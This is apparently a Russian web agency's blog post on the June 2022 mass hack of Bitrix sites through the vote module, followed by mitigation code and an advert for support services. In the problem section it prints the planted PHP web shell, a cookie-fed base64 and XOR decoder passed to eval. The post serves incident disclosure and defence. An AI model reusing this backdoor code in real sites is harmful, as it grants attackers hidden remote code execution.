Тысячи Bitrix сайтов под атакой! Как уберечь свой бизнес на войне

Надежда Светлова Ведущий специалист

04.07.2022 в 18:41

28 июня, в день двадцатой годовщины принятия Конституции Украины, тысячи сайтов российских компаний столкнулись с атаками украинских хакеров. Злоумышленникам удалось внедрить вредоносный код и ограничить функционал сайтов, в результате чего работа сотен компаний была поставлена на паузу на целый день.

Описание проблемы

По словам пользователей форума dev.1c-bitrix.ru, взломы произошли с помощью файлов, записанных в папку upload. Вредоносные файлы, в свою очередь, запустили агентов ID=1.

Хакерское нападение выявило уязвимость модуля vote, отвечающего за опросы и голосования. Эта ошибка — общая для всех сайтов на CMS Битрикс, — оставалась незамеченной с апреля 2022 года. Несмотря на регулярно выходящие обновления, она не была исправлена. 28 июня это стало фатальным для многих компаний, которые своевременно не обновили CMS сайта.

Виновником неполадок стал файл /bitrix/tools/p**n_h**lo.php, а именно содержащийся в нем код:

<?php error_reporting(0);$c=base64_decode($_COOKIE[“6a9d4c231d03dbc5454b74fd1c5d15c1”]);$d=(string)NULL;for($i=0;$i<strlen($c);$i++)$d.=chr(ord($c[$i])^42);eval($d).

Решение

Поиск причины и решение проблемы отняло у компаний несколько часов рабочего времени. Для ее решения потребовалось:

Удалить этот агент:

2. Проверить наличие следующей уязвимости https://bdu.fstec.ru/vul/2022-01141

3. Применить следующий код:

location = /bitrix/tools/vote/uf.php {

if ($request_method = POST) { return 404; }

try_files return @php;

}

4. В файле /bitrix/tools/vote/uf.php перед require прописать:

$request = \Bitrix\Main\Context::getCurrent()->getRequest();

if($request->isPost()) {

CHTTP::SetStatus(“404 Not Found”);

@define(“ERROR_404″,”Y”);

die();

}

Однако после анализа сайтов клиентов мы обнаружили уязвимости еще в нескольких местах и были своевременно исправлены.

Как обезопасить себя и свой бизнес?

Мы настоятельно рекомендуем руководителям и вебмастерам своевременно обновлять CMS сайтов, чтобы избежать подобных инцидентов.

Оглядываясь назад, совершенно очевидно, что проблему для многих проектов можно было решить гораздо быстрее, не теряя несколько часов рабочего времени и, соответственно, прибыль. Выяснилось, что у многих компаний нет программиста или человека, который способен разобраться с кодом сайта на Битрикс, либо был допущен человеческий фактор.

Если вы пока не готовы нанимать в штат специалиста по безопасности, решение есть: отдать круглосуточную поддержку вашего сайта на аутсорс профессионалам в этой области. Наша команда готова взять на себя заботы о внезапных хакерских атаках и любых неполадках. Наши специалисты остаются на связи с клиентами и готовы помочь им в решении любых вопросов.

Заполните заявку или позвоните нам!

Теги публикации: bitrix, CMS, взлом, уязвимость

ВАШ САЙТ ПОД УГРОЗОЙ? Подключите услугу технической поддержки, чтобы защитить ваш проект